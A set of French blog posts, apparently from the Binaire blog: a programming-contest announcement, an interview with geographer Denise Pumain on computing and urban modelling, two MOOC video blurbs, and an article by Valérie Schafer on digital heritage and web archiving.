    Le premier tour se déroule en janvier. Les élèves peuvent participer soit en classe avec leur enseignant, soit en individuel à la maison, en s’inscrivant sur le site d’Algoréa. Les tours suivants ont lieu en mars puis en mai. Ensuite, les meilleurs de chaque niveau scolaire sont invités à participer à la demi-finale organisée en juin, et éventuellement se qualifier pour la finale qui se déroule pendant l’été. Pour ces étapes, il est également possible participer en programmant en C, C++ ou Java.

    Tous les participants à Algoréa pourront repartir l’année suivante directement du niveau atteint cette année, l’objectif étant d’accompagner les élèves dans leur progression d’année en année.

    L´équipe du Castor et de Algoréa, Arthur Charguéraud, Françoise Tort et Mathias Hiron de France IOI, L’ENS Paris Saclay et Inria.

    (*) Le niveau blanc permet de se familiariser avec le principe des séquences d’instructions, des répétitions simples, et des appels de fonctions simples; le niveau jaune permet de découvrir et pratiquer les notions d’instructions conditionnelles, de boucles répéter simples, et l’imbrication de boucles et d’instructions conditionnelles ; le niveau orange permet d’apprendre à manipuler des variables, les opérateurs arithmétiques et booléens, et les boucles « tant que » ; le niveau vert permet d’apprendre à créer ses propres fonctions, manipuler des tableaux, listes et chaînes de caractères ; enfin, le niveau bleu introduit des concepts plus avancés comme les fonctions récursives.

  • La géographie ubiquitaire

    Un nouvel « Entretien autour de l’informatique ». Serge Abiteboul et Claire Mathieu interviewent Denise Pumain , professeure à l’Université Paris 1 Panthéon-Sorbonne et membre de l’Institut Universitaire de France. Elle est spécialiste de l’urbanisation et de la modélisation en sciences sociales. Cet article est publié en collaboration avec TheConversation.

    Denise Pumain, par Claude Truong-Ngoc, CC BY-SA 3.0

    B : Denise, quel est ton métier ?
    DP : Je suis enseignante-chercheure en géographie à l’université Paris I (Panthéon-Sorbonne). J’ai été un temps détachée à l’Institut d’Études Démographiques, un temps à l’Université de Paris Nord à Villetaneuse, un temps recteur de l’académie de Grenoble.

    La géographie est une science sociale interdisciplinaire, avec des interactions fortes avec la sociologie et l’économie, et des liens étroits avec les sciences naturelles. Ma recherche porte sur la géographie humaine, c’est-à-dire l’étude de la manière dont les sociétés organisent leur espace, de manière différenciée selon les régions du monde. Je m’intéresse aux villes et à ce qu’elles ont de commun, notamment dans leur dynamique, la façon dont elles évoluent au cours du temps.

    La principale question des géographes depuis la fin du 18e siècle, c’est de comprendre la diversité du monde. On a d’abord expliqué cette diversité par des inégalités physiques, des différences entre les sols et les cadres naturels, le rôle des dotations initiales naturelles. Jared Diamond a récemment actualisé ce fil explicatif. Mais la géographie a ensuite beaucoup insisté sur la dimension spatiale, les effets de proximité et de réseaux dans les organisations des sociétés et leurs rencontres, selon un mécanisme de type centre-périphérie qui rend compte d’une grande partie des inégalités entre les sociétés humaines, à différentes échelles.

    B : Binaire s’intéresse à la transformation des sciences par l’informatique. En quoi ta discipline a-t-elle été transformée par la notre ?
    DP : L’informatique a introduit des progrès décisifs dans la manière de pratiquer la géographie et a également fait beaucoup pour amplifier les usages de la science géographique dans la société. Je vois trois grandes étapes dans cette évolution.

    L’informatique, automatisation de tâches
    D’abord, dans les années 60-70, nous avons pu informatiser des analyses statistiques. L’ouverture de centres de calcul accessibles aux gens des sciences sociales a changé notre travail. En ce qui concerne la géographie, l’instrument décisif a été l’analyse multivariée pour rendre compte des diversités entre des territoires ruraux, des villes, ou des États. A ces échelles, l’enquête individuelle n’est pas possible, il faut utiliser des recensements. Nous avons utilisé ce qu’on appelle aujourd’hui l’analyse exploratoire des données pour effectuer des comparaisons de manière systématique, plus raisonnée et répétable. Par exemple, j’ai rassemblé des données sur la croissance de plusieurs centaines de villes françaises depuis le recensement de 1831, sur l’évolution de leur démographie et de leur profil économique. Dès 1954, on avait des statistiques sur la composition par branche d’activité économique, la composition socioprofessionnelle, avec des nomenclatures comprenant des dizaines, puis des centaines de catégories, toute une richesse d’informations exploitables par le géographe. Pour nous la quantification a été la solution. Pour moi, l’informatique a donc d’abord été une libération, une possibilité d’objectiver, d’avoir un degré de scientificité plus important qu’auparavant.

    Cybergeo, revue européenne de géographie, en open édition

    La pensée algorithmique
    Ensuite, l’informatique a véritablement transformé notre façon de penser. Elle nous a conduits d’une formalisation essentiellement liée à l’usage des statistiques, à des formalisations bien plus riches utilisant des modèles de simulation. Avec des universitaires de Stuttgart et de l’Université libre de Bruxelles, nous avons exploré des modèles dynamiques d’analyse territoriale et régionale. Avec Thérèse Saint-Julien et Lena Sanders, nous avons pu comparer les transformations socio-économiques des agglomérations de Rouen, Bordeaux, Nantes et Strasbourg au fil du temps.

    Au début des années 80, s’est créée une communauté autour de la simulation pour la géographie, avec des modèles mathématiques d’auto-organisation urbaine, ou encore d’analyse des migrations interrégionales. Cela nous a conduits à des modélisations informatiques par systèmes d’agents. Un agent pouvait être un territoire, une personne, un élément de l’environnement. Les agents, représentés par des êtres informatiques, sont susceptibles d’acquérir des informations sur leur environnement et de communiquer avec d’autres agents pour avoir des interactions, des actions avec d’autres agents. Typiquement, les attributs d’une ville pouvaient être sa population, sa richesse, ses types de production, sa situation portuaire, son attractivité touristique ou le fait d’être une ville capitale. On a beaucoup de mal à connaître tous les échanges que les villes ont entre elles, surtout pour mesurer les échanges économiques ou financiers. On a donc imaginé un système théorique de marché d’échanges entre villes à partir de leurs fonctions économiques ; elles proposent des productions et des services à des villes dans un environnement proche, avec un marché régulant ce commerce, modélisé informatiquement. Les systèmes multi-agents offrent une grande souplesse de modélisation pour représenter une diversité de formes d’interactions dans l’espace selon les fonctions des villes, capitales régionales, ou villes industrielles ou touristiques par exemple.. Les modèles ainsi construits font partie d’une série que nous appelons « SimPop » pour « simulation de population », à partir de systèmes multi-agents.  Cette évolution est trop complexe pour être imaginée sans ordinateurs bien sûr.

    Cette deuxième étape a eu un débouché inattendu. Les modèles SimPop étaient conçus au début par des doctorants dépendant d’informaticiens, et du coup nous n’avions qu’une capacité d’intervention limitée. Puis nous avons pu construire les modèles directement, en réunissant des informaticiens de l’institut des systèmes complexes et des géographes déjà formés à l’informatique. Cela a tout changé pour nous. On pouvait commencer avec un modèle simple pour le raffiner. On pouvait voir l’amélioration produite entre deux versions. On pouvait complexifier le modèle, introduire des effets de contexte environnementaux… Cela nous a permis une meilleure mise au point par exploration de toutes les possibilités offertes par le modèle. On pouvait procéder pas à pas, en réduisant la complexité, et aussi, faire des millions de simulations avec le même modèle. On pouvait vraiment explorer  l’espace des paramètres.

    On a, par exemple, mis au point un modèle informatique d’émergence de ville post-néolithique. Un archéologue peut le nourrir de ses propres données, et vérifier si ce que raconte théoriquement le modèle a un sens sur son cas particulier en archéologie. Ça a été un progrès épistémologique car cette manière de faire des modèles permet de valider des hypothèses scientifiques. On savait par exemple que des villes produisaient des innovations qui se propageaient d’une ville à l’autre. On a pu construire un modèle qui capturait finement cette propagation. Pour la première fois, on pouvait montrer que « nos hypothèses étaient nécessaires et suffisantes ». Par exemple, on a montré que spécifier la durée de vie d’une innovation dans le modèle n’avait pas d’importance.

    Cette modélisation est essentiellement algorithmique. Nous apprenons énormément des algorithmes. Cette seconde étape, c’est donc l’entrée de la pensée algorithmique dans notre discipline.

    La géographie au quotidien
    La troisième et dernière étape que je considèrerai tient de l’arrivée des systèmes d’information géographique (GIS en anglais) et, dans notre quotidien, de données géo-localisées de manière massive. Cela me semble être un véritable bouleversement.

    La première loi de la géographie, c’est celle de la proximité : tout interagit avec tout, mais deux choses proches ont plus de chances d’interagir que deux choses lointaines. Aujourd’hui, des applications vous donnent des informations sur vos amis qui sont dans le voisinage ou sur d’autres qui sont géographiquement très loin. Le numérique permet d’élargir considérablement les interactions, et les distances jouent un moins grand rôle. Malgré cela, la géographie prend une place considérable. Il n’y a pas de chômage chez les géographes numériciens ! Ils trouvent du travail, par exemple, en géo-cartographie des prix immobiliers, ou dans le suivi des flottes de véhicules pour des entreprises de transports. Les concepts, la visualisation, les outils qu’ils utilisent, s’appuient sur des savoir-faire de la cartographie et de la géographie : la géomatique, que certains appellent gis-science !

    OpenStreetMap

    Les cartes géographiques prennent énormément d’importance. Les cartes ont été longtemps du ressort des états-majors, selon la formule : « la géographie, ça sert d’abord à faire la guerre ». L’IGN a d’ailleurs été créé par hasard en 1940 pour éviter que les Allemands ne mettent la main sur la cartographie de l’armée. Les citoyens utilisent aujourd’hui quotidiennement des cartes numériques sur leurs téléphones, Avec des systèmes comme OpenStreetMap, ils s’approprient la cartographie ; ils participent à la mise au point des cartes, à leurs mises-à-jour en temps réel.

    Les villes industrielles en Chine sont encore souvent de très grandes villes, en position littorale Source : Elfie Swerts, http://geodivercity.parisgeo.cnrs.fr/blog/tag/china/

    B : Y a-t-il eu des surprises dans l’évolution des villes ces cinquante dernières années ?
    DP : Oui, clairement, celle des villes chinoises. L’urbanisation chinoise a été très forte, rapide, contrôlée, avec des résultats indéniables (il n’y a pas de bidonville), et une capacité à prendre en compte les nécessités écologiques. Tout cela se fait sous contrôle étatique mais décentralisé, car la capacité d’urbaniser a été transférée au niveau des villes et districts. Il nous faut modifier nos modèles pour tenir compte de ces contrôles. Mais cette urbanisation est une urbanisation intelligente, s’appuyant sur l’existant, donc il y a une continuité, un suivi qui correspond aux principes que des millénaires d’évolution de l’urbanisation nous ont enseignés.

    La première loi de la géographie à l’épreuve du numérique

    B : Peut-on envisager une transformation des villes du fait de la numérisation ? La remise en question peut-être de la première loi de la géographie ?
    DP : On peut envisager un retour vers les villes petites et moyennes, qui étaient traditionnellement vues comme condamnées à une perte de substance, et qui seront peut-être sauvées par le télétravail. Il y a eu une tendance lourde à la concentration dans les grandes villes au détriment des petites, et ce processus s’est accéléré dans les années 80. Après le recensement de 1982, et surtout celui de 1990, la métropolisation, c’est-à-dire la convergence de la population vers les grandes villes, est devenue claire. Est-ce que cela va changer avec la téléprésence ? Qualitativement, l’effet est encore limité à des métiers où la coprésence et l’action collective ne sont pas absolument nécessaires tout le temps ; cela reste coûteux, car impliquant des déplacements vers de grandes villes quand les face-à-face sont nécessaires. Donc la métropolisation continue, et je ne la vois pas diminuer.

    Je crois que les gens et l’économie ont besoin de proximité. Par exemple, l’essentiel des transactions financières est assuré par juste trois grandes villes, New York, Londres et Tokyo ! Les financiers qui font des produits dérivés à outrance savent que si on veut spéculer sur la petite marge quasi-instantanée, il faut être à quelques nanosecondes par câble des centres financiers. Le virtuel n’invalidera pas, selon moi, la première loi de la géographie. Rien dans l’histoire ne me conduit à le penser. Les décentralisations historiques fortes n’ont été observées qu’en périodes de guerre.

    B : Comme géographe, tu es dans une situation privilégiée pour étudier les évolutions du monde. Qu’as-tu observé ?
    DP : Je trouve inquiétant le creusement des inégalités de revenus, ainsi qu’une certaine passivité devant les problèmes sociaux causés par l’organisation de la finance mondiale qui entame sans vergogne des processus entraînant des catastrophes. Nous vivons aussi un grand bouleversement avec l’afflux des informations vraies ou fausses, leur amplification. Il suffit de voir par exemple l’élection de Trump et le Brexit pour comprendre les conséquences catastrophiques que peuvent avoir des processus mal compris, mal contrôlés. Mais le pire n’est pas toujours certain. La géographie apprend à croire dans les capacités de réactions des sociétés humaines. Dans les années 60, il aurait été impossible d’imaginer que l’on serait capable de nourrir sept milliards d’habitants. On sait le faire et le pourcentage de la population situé sous un seuil de pauvreté s’est même réduit. Reste qu’il faut être conscient des menaces et de la nécessité de structures intermédiaires pour contrebalancer les effets du libéralisme exacerbé et du pouvoir non contrôlé.

    Serge Abiteboul, Inria, ENS, Paris, Claire Mathieu, CNRS, ENS, Paris

    (*) Jared Diamond est un géographe biologiste évolutionniste, physiologiste et géonomiste américain. Nous recommandons fortement sur le sujet qu’aborde Denise Pumain son best seller « De l’inégalité parmi les sociétés », prix Pulitzer 1998 (Guns, Germs, and Steel).

  • Podcast : géomatique

    Qu’apprend-on de la géomatique ?

    Le traitement des données géographiques est un exemple particulièrement significatif de la transformation d’une discipline par le  « Big Data ».  La géomatique est devenue incontournable dans l’étude et la compréhension des écosystèmes et apporte une aide à la décision précieuse  pourvu qu’on sache bien en dresser les limites…

    Cette vidéo est un des grains de culture scientifique et technique du MOOC sur l’Informatique et la Création Numérique. La vidéo a été réalisée par Manhattan Studio Production.

    Pascal Barbier est géomaticien, ancien enseignant en SIG et chef de département à l’ENSG, École Nationale des Sciences Géographiques en charge des questions de formation à distance. Il a été chargé de mission pour le développement des applicatifs SIG pour accompagner le schéma directeur de la région Ile de France (SDREIF).

    Pour aller plus loin

    Ressources pédagogiques

  • Podcast: numérique et écriture

    Comment interagir avec une narration ?

    Pour ce qui est de lire et écrire à l’âge numérique, tout est bouleversé. Le fait de dupliquer et transmettre l’information à coût quasiment nul, mais avec le risque d’une faible pérennité, le fait que chaque personne puisse devenir auteur sur le Web, mais au risque de voir sa production noyée dans l’océan informationnel, voilà un grand nombre de problématiques qui se téléscopent. Reprenons méthodiquement…

    Cette vidéo est un des grains de culture scientifique et technique du MOOC sur l’Informatique et la Création Numérique. La vidéo a été réalisée par Manhattan Studio Production.

    Olivier Banus a une formation de professeur d’histoire-géographie avant de devenir référent et animateur numérique et ingénieur pédagogique au CRDP devenu Canopé. Il est aujourd’hui coordonnateur territorial formation (PACA) chez Réseau Canopé.
    Il est aussi investi dans des actions culturelles bénévoles et porte pour Canopé le projet Class’Code.

    Pour aller plus loin

  • Numérique : ne perdons pas la mémoire

    Valérie Schafer

    Binaire est très sensible au patrimoine numérique et son devenir. Dans un long article paru chez nos amis d’)i(nterstices, « Le patrimoine numérique, entre enjeux matériels et immatériels »  Valérie Schafer fait le point sur la question du patrimoine et référence de très nombreuses initiatives pour le Web et les réseaux sociaux, qui montrent parfois le retard que nous avons pris sur certains aspects en France. Pierre Paradinas (Cnam).

    Le patrimoine numérique, entre enjeux matériels et immatériels 

    Nous passons tous les jours du temps sur Internet, mais nous avons déjà oublié les sites que nous visitions assidûment il y a dix ans. À quoi ressemblaient-ils ? Pour s’en souvenir, nous pouvons nous plonger dans les archives du Web. La question de l’archivage du patrimoine numérique a d’ailleurs pris de l’ampleur ces dernières années…

    Photo Jason Scott [CC BY 2.0], via Wikimedia Commons.
    « Internet Archive redonne vie au Macintosh de 1984 », « Internet Archive : testez le Macintosh de 1984 dans votre navigateur », pouvait-on lire en ligne à la mi-avril 2017, sur des sites spécialisés dans les contenus informatiques et numériques. La fondation Internet Archive annonçait en effet la sortie d’un émulateur permettant de retrouver l’environnement des premiers ordinateurs personnels et avec lui des logiciels comme MacWrite, MacPaint ou des jeux tels que Dark Castle et Space Invaders.

    Cette annonce médiatisée, le succès d’expositions consacrées aux jeux vidéo ces dernières années ou celle consacrée aux gifs par le Museum of the Moving Image de New York en 2014, le dynamisme d’institutions comme le Computer History Museum aux États-Unis, ou encore l’organisation en juin 2017 à Londres d’une semaine consacrée aux archives du Web (Web Archiving Week), sont autant de signes d’un intérêt pour le patrimoine numérique sous toutes ses formes. C’est ce patrimoine varié et hétérogène, conjuguant aspects matériels et immatériels et réunissant de nombreuses parties prenantes que nous vous invitons à découvrir, mais aussi les enjeux sous-jacents de cette patrimonialisation. En effet, la volonté de conserver les documents et traces numériques, d’archiver le Web, de transmettre aux générations futures un patrimoine informatique, si elle s’inscrit dans la continuité d’initiatives de patrimonialisation à la fois technique, scientifique et industrielle, devient aussi une patrimonialisation de la communication et par son ampleur acquiert un statut particulier, reconnu en 2003 par l’Unesco : celui de patrimoine numérique.

    Les différentes facettes du patrimoine numérique

    En octobre 2003, le patrimoine numérique est reconnu — et ainsi son existence et sa valeur pleinement légitimées — par une Charte de l’Unesco qui met sous un même chapeau, tout en les distinguant, patrimoine numérisé et patrimoine nativement numérique (ce que les Anglo-Saxons appellent Born-Digital Heritage) :

    « Le patrimoine numérique se compose de ressources uniques dans les domaines de la connaissance et de l’expression humaine, qu’elles soient d’ordre culturel, éducatif, scientifique et administratif ou qu’elles contiennent des informations techniques, juridiques, médicales ou d’autres sortes, créées numériquement ou converties sous forme numérique à partir de ressources analogiques existantes. Lorsque des ressources sont « d’origine numérique », c’est qu’elles existent uniquement sous leur forme numérique initiale », note ainsi la Charte. Celle-ci énumère quelques-uns de ces documents nativement numériques qui peuvent être des textes, des bases de données, des images fixes et animées, des documents sonores et graphiques, des logiciels et des pages Web.

    Si ce patrimoine partage bien des points communs avec le patrimoine culturel immatériel défini par l’Unesco la même année, une troisième forme de patrimoine, que nous qualifierons de patrimoine du numérique pour le distinguer des précédents, apparaît aussi en filigrane. Ainsi, la Déclaration de Vancouver sur le numérique de 2012 — La Mémoire du monde à l’ère du numérique : numérisation et conservation — souligne à quel point les enjeux matériels sont prégnants pour la sauvegarde d’un patrimoine numérique risquant d’être perdu en cas d’obsolescence rapide du matériel et des logiciels qui servent à le créer.

    La conservation du matériel a certainement été l’enjeu le mieux identifié et le plus rapidement dans le cadre de la poursuite des projets de conservation d’un patrimoine technique, industriel et scientifique. Elle n’a pas attendu le numérique pour être prise en charge par de multiples acteurs de la patrimonialisation.

    Depuis la fermeture en 2010 du musée de l’informatique installé à la Défense, il n’existe plus de lieu fédérateur unique pour les collections françaises, alors dispersées entre différentes associations et musées dont celui des Arts et Métiers. Mais un mouvement est actuellement entrepris pour la réalisation d’un projet global s’appuyant sur des matériels, logiciels, documentations techniques et histoires orales, déjà préservés par plusieurs partenaires et acteurs de la gestion du patrimoine du numérique sur l’ensemble du territoire français (l’ACONIT, AMISA, le Cnam et son musée, la FEB, Homo Calculus, ou encore l’Espace Turing).

    Outre la préservation indispensable des matériels, le patrimoine numérique doit absolument être associé à une réflexion sur les éléments de documentation divers  (guides et modes d’emploi, Cd-Roms, kits de connexion, etc.), qui permettent de le recontextualiser, mais aussi de retrouver un patrimoine interactif. En effet, l’émulation, la préservation de consoles, d’ordinateurs, d’interfaces de programmation applicative (API), contribuent à les maintenir vivants au sein de leur écosystème. Brewster Kahle l’avait relevé dès 1997 dans Archiving the Internet, notant que « alors qu’il est possible de lire un livre ancien de 400 ans imprimé par Gutenberg, il est souvent difficile de lire une disquette informatique qui a 15 ans ». Celui qui dès 1996 bouleverse le patrimoine numérique en se lançant par la création d’Internet Archive dans l’entreprise titanesque d’archiver le Web mondial soulignait déjà des enjeux que relèvent aujourd’hui en partie sa fondation et une pluralité d’autres acteurs, institutionnels et scientifiques, parmi lesquels le récent projet Software Heritage soutenu par Inria.

    Le patrimoine nativement numérique : d’Internet Archive à Software Heritage

    La Charte de l’Unesco en 2003, en insistant sur le patrimoine dit « d’origine numérique » (mentionné dans les articles 1 et 7) au même titre que le patrimoine numérisé, reconnaît la valeur de documents qui n’existent qu’en format numérique, mais aussi les efforts de préservation et de patrimonialisation engagés en amont de cette Charte.

    Parmi les pionniers dans ce domaine, la fondation Internet Archive est lancée en 1996 par Brewster Kahle en s’appuyant sur son entreprise Alexa (créée en 1996 et vendue à Amazon en 1999), spécialisée dans l’analyse de flux et la recommandation de sites. Dès 2001, la Wayback Machine permet aux internautes de parcourir la Toile du passé (aujourd’hui 286 milliards de pages archivées).

    Figurines en céramique de Ted Nelson, Mary Austin et Brewster Kahle présentes dans la grande salle d’Internet Archive à San Francisco. Photo Jason Scott [CC BY-SA 2.0], via Wikimedia Commons.
    En parallèle, d’autres initiatives se manifestent, par exemple au sein des bibliothèques nationales canadiennes et australiennes. Des projets précoces dans les pays scandinaves visent aussi dans la seconde moitié de la décennie 1990 à étendre le périmètre du dépôt légal au Web, tandis qu’est lancé le projet AOLA (Austrian On-Line Archive) au début des années 2000 pour développer un archivage du Web autrichien.

    Toutes ces démarches font écho aux évolutions qu’ a connues le patrimoine au cours des dernières décennies, à une patrimonialisation de plus en plus sensible à de nouveaux objets, mais aussi à l’ascension du numérique, qui prend place dans des aspects de plus en plus étendus et variés de nos vies professionnelles, économiques, sociales et personnelles.

    Le mouvement est suivi dans la décennie 2000 par de nombreux pays européens, la France inscrivant l’archivage du Web dans le dépôt légal en 2006. Déjà dotée d’une expérience de conservation des vidéogrammes et documents multimédia composites depuis 1975 puis des multimédias, logiciels et bases de données depuis 1992, la Bibliothèque nationale de France (BnF) prend alors en charge cette mission avec l’Institut national de l’audiovisuel (Ina) qui se voit confier les sites Web relevant du périmètre audiovisuel. Au-delà de ces initiatives nationales, des initiatives transnationales peuvent être évoquées, par exemple le lancement en 2008 du projet LiWA (Living Web Archives).

    En 2009, le projet Memento du Los Alamos National Laboratory Research Library a par ailleurs permis de réaliser un outil libre, offrant aux internautes un accès aux versions précédentes d’une page web grâce à un plug-in à ajouter au navigateur. Dans le même esprit, le projet « 404-no-more » porté par Firefox et Internet Archive vise à éliminer les « erreurs 404 » en redirigeant automatiquement vers une version archivée de la page demandée.

    Outre les archives du Web, les archives des Newsgroups, espaces de discussion de la communauté Usenet (réseau né à l’extrême fin des années 1970), méritent aussi notre attention : gérées depuis 2001 au sein du service de forum Google Groups, elles « ont accompagné les efforts de légitimation de l’entreprise auprès des publics d’utilisateurs, à une époque où Google était en phase de développement et de diversification de ses activités », rappelle Camille Paloque-Berges dans son article. « Google, alors en train de gagner la guerre de moteurs de recherche, s’est érigé par ce geste en protecteur du passé du réseau, ainsi qu’en candidat à sa propre reconnaissance au sein de cette histoire. »

    Les communications et usages numériques les plus récents n’échappent pas non plus à cette patrimonialisation, à l’instar de l’archivage de Twitter, pris en charge par la Bibliothèque du Congrès américaine en vertu d’un accord avec Twitter depuis 2009 ou encore, avec un périmètre beaucoup plus restreint, le suivi par l’Ina et la BnF de quelques centaines de comptes Twitter et mots-dièses précis.

    Enfin, parmi les derniers venus, avec des ambitions complémentaires des autres et spécifique à un champ jusque-là peu préservé, le projet Software Heritage lancé en 2016 complète ce paysage en plein essor. Comme le note Roberto di Cosmo, un des principaux instigateurs et porteurs de cette initiative : « […] Archiver du code source pose des problèmes spécifiques qu’on ne rencontre pas dans d’autres domaines. […] La préservation du code source avec ses spécificités n’était vraiment au cœur de la mission de personne : on préservait des logiciels exécutables, jouables, des jeux vidéo, c’était notamment fait par Internet Archive qui a une grosse sélection de jeux vidéo. On préservait des pages web qui parlaient de logiciels et de codes sources. Mais les codes sources, comme objet noble, non. »

    L’articulation entre patrimoines et publics

    Public scientifique, experts, amateurs et grand public, monde des médias, industriels, étudiants et enseignants, les publics potentiels du patrimoine numérique sont nombreux et les usages de celui-ci encore largement à explorer, favoriser, stimuler, inventer. Ainsi Roberto Di Cosmo espère que le projet Software Heritage intéressera les acteurs du patrimoine scientifique et technique ainsi que ses publics, mais aussi le monde de la recherche scientifique, qui pourra y trouver une archive de référence, ou encore le monde industriel.

    Cependant, pour réunir et accueillir pleinement les publics, plusieurs défis sont encore à relever, car la vocation d’ouverture et de participation n’a pas toujours été pensée au préalable : bien sûr, il y a des questions d’accessibilité des données, notamment dans le cadre du dépôt légal, qui limite la consultation des archives du Web in situ en France à la BnF et quelques bibliothèques en région. Mais les enjeux concernent aussi l’interopérabilité, qui se pose par exemple à l’échelle européenne, car les fonds d’archives du Web sont imperméables entre les différents pays. L’accessibilité doit aussi être cognitive et pose le problème de l’accompagnement dans la découverte de ces sources, de la maîtrise des outils de traitement, de la littératie numérique, du substrat de culture informatique et numérique nécessaire (sujet d’actualité autour de l’apprentissage du code dans le secondaire). Enfin, des enjeux éthiques ne peuvent manquer de se manifester. Reste également à penser davantage la place de ces publics en amont même des réalisations. Comme le notaient en 2011 Hafizur Rahaman et Beng-Kiang Tan dans leur article :

    « Les projets actuels de patrimonialisation numérique se concentrent surtout sur le « processus » ou sur le « produit », mais ne considèrent que rarement les « utilisateurs » […]. Pour une meilleure interprétation et expérience d’un site relevant du patrimoine numérique, il nous faut une méthode d’interprétation inclusive, qui devrait tenir compte de la variété de compétences des utilisateurs, dépasser la linéarité de la narration et la subjectivité dans la création des contenus. » (traduction : Francesca Musiani)

    Si en quelques années la situation a déjà beaucoup évolué, notamment sous l’effet d’échanges de plus en plus féconds et nombreux entre le monde des archives, des bibliothèques et des chercheurs, elle peut aller encore plus loin pour pleinement inscrire dans cette dynamique les producteurs et publics, notamment les « publics ordinaires ». Ceux-ci restent souvent simples spectateurs de choix qui ne sont au demeurant pas le seul fait des institutions patrimoniales, mais aussi de plus en plus souvent des grandes entreprises de communication.

    Des objets de recherche, des objets au service de la recherche

    Alors qu’à ses débuts, le patrimoine nativement numérique concernait essentiellement le monde des bibliothèques et des archives, les chercheurs commencent à s’y intéresser sérieusement depuis quelques années, l’envisageant à la fois comme objet de recherche propre et objets-sources au service de leurs recherches.

    La réflexion a d’abord porté sur le patrimoine numérisé, que ce soit dans le champ de l’histoire ou des sciences de l’information et de la communication, mais des initiatives comme les ateliers du Dépôt Légal du Web à l’Ina, sont un jalon important en France dans l’implication des communautés de recherche autour des archives du Web.

    Comme le relevait Louise Merzeau, coorganisatrice des ateliers, dans son article : « Bien sûr, ce déploiement d’une vue stratifiée du réseau ne nous est pas familier, et il nous faudra apprendre à la manipuler. Comme outil de représentation, de navigation et de compilation, c’est l’archive elle-même qui produira ces nouveaux usages. De la même manière que l’archivage des sources audiovisuelles a rendu possibles quantité de recherches sur la radio et la télévision qu’on ne pouvait auparavant formaliser, le dépôt légal du Web est une condition de sa conversion en fait de culture. »

    Les historiens du monde contemporain se convertissent aujourd’hui pour certains avec enthousiasme à ces nouvelles sources. Au sein de ces approches, l’importance des réflexions épistémologiques et méthodologiques est notable : sans rompre avec les méthodes historiennes antérieures, les chercheurs sont conscients de l’importance de bien comprendre ces sources avant de les exploiter. Nous avons notamment pu souligner avec Francesca Musiani et Marguerite Borelli dans notre article « Negotiating the Web of the Past » l’importance d’ouvrir les boîtes noires des archives du Web pour en saisir les biais et les multiples médiations subies au cours de l’archivage. Nous n’en rappellerons ici que quelques rapides éléments afin d’insister sur le fait que, comme l’avait noté l’historien danois Niels Brügger en 2012 dans la revue Le Temps des Médias, l’archive du Web est rarement une copie parfaite du site Web dans son aspect originel sur le Web vivant. Enchâssée dans des interfaces de consultation contemporaines, transformée sous l’effet de la perte de documents (des publicités, des images dans les années 1990, etc.), une page subit de nombreux changements. Ceux-ci sont encore amplifiés à l’échelle d’un site, par la remise en hypertextualité, quand certains hyperliens introduisent des sauts temporels entre plusieurs pages archivées à des dates différentes, mènent parfois à des impasses (les pages ne sont pas toutes archivées, et un site est rarement archivé à plus de deux ou trois clics de profondeur), etc. Comprendre les techniques, périmètres, choix de conservation opérés par les institutions est un préalable à une création raisonnée de corpus, quand bien même le chercheur semble avoir à disposition suffisamment, voire trop, de données à étudier.

    L’archivage de Twitter au moment des attentats parisiens de 2015, opéré par la BnF et l’Ina, en témoigne. Ainsi, si l’Ina a pu collecter au moment de ces attentats environ 11 millions de tweets, reste que cette collection pléthorique comporte nécessairement certains biais et lacunes, notamment par le choix des mots-dièses archivés (dont la sélection a été faite en temps réel, au cours des événements) ou encore par des pertes de tweets au moment de la collecte via l’API publique de Twitter (celle-ci limite en effet la collecte gratuite à 1% du flux mondial à un instant donné. Or les flux Twitter consacrés aux attentats ont parfois représenté plus de 1% du total de tweets émis au niveau mondial, faisant perdre partie d’entre eux).

    De cette masse de données découle aussi une autre piste de réflexion, sur la nature des outils permettant d’exploiter ces vastes gisements. Comme le souligne Thomas Drugeon, responsable du dépôt légal du Web à l’Ina, lors de notre entretien — et la question se pose à l’identique côté BnF —, le chercheur ne peut emporter avec lui les données, pour leur offrir le traitement appareillé par les outils informatiques de son choix. Les règles du dépôt légal le contraignent à traiter ces documents dans les enceintes des institutions. Aussi le monde des archives du Web développe-t-il de plus en plus des outils destinés à accompagner les chercheurs, permettant notamment dans le cas de l’Ina la réalisation de timelines ou de nuages de mots, le suivi de la circulation et de la popularité d’images, ou encore le croisement de nombreuses métadonnées, dont témoignent quelques-unes des figures suivantes.

    Possibilité de croiser les données et métadonnées au cours de l’exploration des tweets et mots-dièse dans l’interface Ina. © Ina
    Timeline et statistiques d’une recherche sur #prayforparis dans l’interface Ina. © Ina
    Possibilité de générer un nuage de mots à partir d’une recherche, ici sur #jesuisahmed, dans l’interface Ina. © Ina

    La BnF, en implémentant également dans ses archives des attentats de 2015 une recherche plein texte qui permet de croiser de multiples facettes, offre une entrée facilitée dans les données, non sans questionner également le chercheur sur les biais que ces outils peuvent induire dans la recherche qu’il va mener et la manière dont il va aborder ces masses de données.

    Recherche plein texte et possibilité d’affiner les résultats à l’aide de facettes dans les archives du Web des attentats de 2015. © BnF

    Conclusion

    « Toute personne qui travaille avec des archives du Web s’est rapidement habituée au fait que la plupart des gens n’en ont même jamais entendu parler — et encore moins comprennent ce qu’elles sont et comment y accéder. En 2016 cependant, il semble que les archives du Web ont commencé à pénétrer la conscience du public, à passer des pages Technologies de la presse aux sections politiques et même culturelles », notait Jane Winters dans son article en début d’année. L’année 2016 aura-t-elle été celle des archives du Web, comme le suggère l’historienne britannique, familière de ces matériaux depuis plusieurs années ? Et ce succès de visibilité ne risque-t-il pas de se faire au détriment d’autres patrimoines numériques, moins valorisés actuellement, mais tout aussi importants (conservation des banques de données par exemple) ?

    Dans tous les cas, en France comme dans le monde anglo-saxon, ce sujet, jusque-là plutôt confidentiel, aura fait l’objet d’une plus large couverture médiatique, notamment de la part du Monde, de Libération ou encore de L’Express, à la faveur des vingt ans de la fondation Internet Archive et des dix ans du dépôt légal du Web en France. Ainsi, les 22 et 23 novembre 2016, au cours du colloque « Il était une fois dans le Web. 20 ans d’archives de l’Internet en France », se réunissaient de multiples acteurs intéressés par ce patrimoine, professionnels de l’archivage et des bibliothèques, des médias, journalistes et chercheurs. Tous les intervenants témoignaient avec passion des défis techniques, mais aussi politiques et culturels passés et à venir de ce patrimoine nativement numérique. De plus en plus pléthorique, ce patrimoine mettra également au défi l’écriture de l’histoire, non seulement celle du numérique mais celle de nos sociétés contemporaines dans toutes ses facettes.

    Valérie Schafer (Historienne, chargée de recherche CNRS à l’Institut des sciences de la communication).

    Retrouver )i(nterstices

  • À propos des données pédagogiques

